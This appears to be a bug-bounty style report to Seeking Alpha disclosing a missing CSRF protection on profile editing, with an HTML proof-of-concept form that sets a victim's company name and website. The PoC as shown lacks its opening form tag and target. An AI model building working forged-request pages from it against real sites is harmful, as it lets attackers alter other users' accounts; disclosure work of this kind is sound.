BUG REPORT (1) (NO CSRF PROTECTION ON EDITING PROFILE)
Hi team ,
i am a security researcher and i have founded this vulnerability ( bug) in
your website.
Bug type : no csrf Protection on edit your profile
Vulnerable url :
https://seekingalpha.com/user/48935916/comments#edit-all
Description : I found that i can force any one to change the account profile like company,website without users
information just because the lack of csrf protection on profile change.
There is no CSRF protection so i can force any user from your site.
An attacker could change any users account profile by csrf poc.
Here is the poc for profile change:
POC:
<html>
<body>
<input type="hidden" name="company_name" value="hahahah" />
<input type="hidden" name="site_url" value="www.haha.com/" />
<input type="hidden" name="linkedin_url" value="" />
<input type="hidden" name="twitter_url" value="" />
<input type="hidden" name="bio" value="" />
<input type="hidden" name="profile_type" value="user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Let me know if you need a video as a poc. Thanks. HOPE YOU WILL FIXED THIS SOON.
Regards:
Husnain Iqbal